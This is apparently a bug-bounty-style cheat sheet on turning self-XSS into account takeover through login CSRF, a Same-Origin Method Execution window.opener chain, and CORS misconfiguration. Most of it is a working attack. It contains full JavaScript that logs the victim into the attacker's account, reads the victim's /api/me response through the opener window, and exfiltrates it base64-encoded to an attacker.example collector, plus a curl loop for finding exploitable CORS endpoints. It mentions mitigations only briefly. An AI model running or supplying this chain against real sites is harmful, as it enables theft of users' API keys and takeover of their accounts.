Self-XSS Bypass

CSRF In Login

  • Check whether the login form is protected against CSRF. If it is not, the attacker can log the victim into the attacker's account with an auto-submitted login form (login CSRF); the victim then browses the application as the attacker, and the self-XSS payload stored in the attacker's profile executes in the victim's browser. Because the victim's cookies now belong to the attacker's session, what the payload can reach is what is still left in the victim's browser: other same-origin windows rendered under the victim's own session (the SOME chain below), data left in localStorage, or whatever the victim types after re-authenticating.

fetchLater()

SOME (Same-Origin Method Execution)

Bypass Self-XSS via SOME: short steps

Setup: a stored self-XSS in your profile that only renders on your own dashboard. The victim (a bot or an admin) visits your link. Goal: leak sensitive data (for example an API key returned by /api/me) through a window.opener chain. The exploit page is hosted on attacker.com.

Step 1: Confirm Self-XSS

Inject a probe payload in the profile name field and check where it renders.

If it fires only on your own dashboard, where no other user can see it, it is a self-XSS and a candidate for the escalation below.

Step 2: Build Parent Page A (exploit.html on attacker.com)

Parent page A opens the child window B pointing at your XSS page, then navigates itself to the sensitive endpoint (/api/me). Once A is on the target origin, B can read A's document through window.opener.

Step 3: Build Child Payload B (Inject in self-XSS)

The payload stored in your profile, which the victim's browser runs once the dashboard renders under your account. It waits for the parent to finish loading, then reads window.opener.document and exfiltrates it. Poll the opener every 100-200 ms instead of trusting a single delay: reading it throws while A is still cross-origin. Ordering matters for the login CSRF that switches the victim into your account: A must already have rendered the victim's /api/me before the cookies change, because a document that is already rendered keeps the victim's data, while any request made after the switch returns your own account's data.

Step 4: Deliver & Trigger

  • Victim visits attacker.com/exploit.html.

  • Flow: A opens B (XSS fires) → A loads /api/me → B steals & exfils (base64 via btoa).

Step 5: Handle Multi-Step (e.g., Confirmations)

If the target needs more than one request (for example a confirmation click after login), open a third window from A and let it drive the extra steps on a timer, so that A stays free to navigate to the sensitive endpoint and hold its content.

Tips: window.opener access only works once both windows are on the same origin. The SOMEtime Burp extension finds JSONP endpoints with attacker-controlled callback names, the classic SOME entry point. Mitigation: allow only static callback names or drop JSONP altogether, and set Cross-Origin-Opener-Policy: same-origin on sensitive pages, which leaves a cross-origin opener with a null window.opener.
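As an added worked example (not code from the original page), the login CSRF from "CSRF In Login" and steps 2 to 5 of the SOME chain as one orchestration in JavaScript. The target origin, paths, window names, form fields and credentials are assumptions; the third window from Step 5 performs the login CSRF and the dashboard reload so that A stays free to hold the victim's /api/me:

```javascript
// Added example, not code from the original page: the login CSRF from the
// "CSRF In Login" section and the SOME window.opener chain from steps 2-5,
// as one orchestration. Every origin, path, window name, field name and
// credential below is an assumption; change them to match the target.
//
// Windows (the victim's browser, starting at attacker.example/exploit.html):
//   A  runParent        opens B and C, then navigates itself to /api/me while the
//                       victim's own cookies are still in place.
//   C  runHelper        once A has moved on, logs the victim into the attacker's
//                       account (login CSRF) and reloads B's dashboard; B's opener
//                       is still A, because navigation does not change the opener.
//   B  stealFromOpener  the stored payload; fires when the dashboard renders under
//                       the attacker's session, reads A (now same-origin) and exfils.
// Each function takes its window object as a parameter so the logic can be run and
// tested outside a browser; on the real pages call it with `window`.

const TARGET = "https://target.example";
const DASHBOARD = TARGET + "/dashboard";          // page that renders the profile name (self-XSS)
const SENSITIVE = TARGET + "/api/me";             // assumed endpoint exposing the API key
const LOGIN = TARGET + "/login";                  // assumed login form with no CSRF token
const HELPER = "https://attacker.example/helper.html";
const EXFIL = "https://attacker.example/collect"; // assumed collector
const ATTACKER_CREDS = { username: "attacker", password: "attacker-pass" }; // assumed

// Window A (attacker.example/exploit.html)
function runParent(win) {
  win.someB = win.open(TARGET + "/", "someB");    // B: any target page, victim session, no payload yet
  const c = win.open(HELPER, "someC");
  // Leave attacker.example only after C has taken its reference to B: once A is on
  // the target origin, C can no longer read A's properties.
  const timer = win.setInterval(() => {
    if (c.ready) { win.clearInterval(timer); win.location.href = SENSITIVE; }
  }, 50);
  return c;
}

// Window C (attacker.example/helper.html)
function runHelper(win) {
  const b = win.opener.someB;                     // same-origin with A at this moment
  win.ready = true;
  win.setTimeout(() => loginCsrf(win), 300);      // A has rendered the victim's /api/me by now
  win.setTimeout(() => { b.location.href = DASHBOARD; }, 800); // dashboard under attacker session -> XSS
  return b;
}

// Login CSRF: auto-submitted top-level POST (target=_blank), so SameSite=Lax
// session cookies set by the response are stored.
function loginCsrf(win) {
  const form = win.document.createElement("form");
  form.method = "POST";
  form.action = LOGIN;
  form.target = "_blank";
  for (const [name, value] of Object.entries(ATTACKER_CREDS)) {
    const input = win.document.createElement("input");
    input.type = "hidden";
    input.name = name;
    input.value = value;
    form.appendChild(input);
  }
  win.document.body.appendChild(form);
  form.submit();
  return form;
}

// Window B payload, stored in the profile name as <script>...</script> with this
// function inlined and called as stealFromOpener(window). Reading the opener throws
// while A is cross-origin, so poll instead of trusting a single delay.
function stealFromOpener(win, attempt = 0) {
  let text;
  try {
    text = win.opener.document.body.innerText;
  } catch (e) {
    if (attempt < 25) win.setTimeout(() => stealFromOpener(win, attempt + 1), 200);
    return null;
  }
  const url = EXFIL + "?d=" + encodeURIComponent(win.btoa(text));
  new win.Image().src = url;                      // fire-and-forget exfil
  return url;
}

// Collector side: undo the btoa/URL encoding
function decodeExfil(url) {
  return atob(new URL(url).searchParams.get("d"));
}
```

exploit.html calls runParent(window), helper.html calls runHelper(window), and the stored profile payload is stealFromOpener applied to window. Two conditions decide whether the chain works at all: the victim's session cookie must be attached to A's cross-site navigation to /api/me (SameSite=None or Lax, not Strict), and the target must not send Cross-Origin-Opener-Policy: same-origin, which leaves B with a null opener.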

CORS + Self-XSS to ATO Checklist

  1. Got self-XSS? Confirm that the payload executes, even if only in your own session.

  2. Check for a CORS misconfiguration: feed the candidate URLs to CorsMe, or test each one with curl and look for your Origin being echoed back. curl needs -D - to print the response headers (with -s alone only the body is printed), the grep must be case-insensitive because servers send Access-Control-Allow-Origin, and printf is used because echo does not interpret \033 without -e:

    cat corstexturl.txt | CorsMe

    cat corstexturl.txt | sort -u | while read -r host; do
      curl -s --path-as-is --insecure -D - -o /dev/null -H "Origin: test.com" "$host" \
        | grep -qsi "^access-control-allow-origin: test.com" \
        && printf '%s \033[0;31mcors vulnerable\033[0m\n' "$host"
    done

    A reflected origin only matters for account takeover if Access-Control-Allow-Credentials: true is present as well; without it the browser does not send the victim's cookies with the cross-origin request.

  3. Exploit CORS: replace the alert-style proof of concept with a payload that reads the API with the victim's credentials and exfiltrates the response.
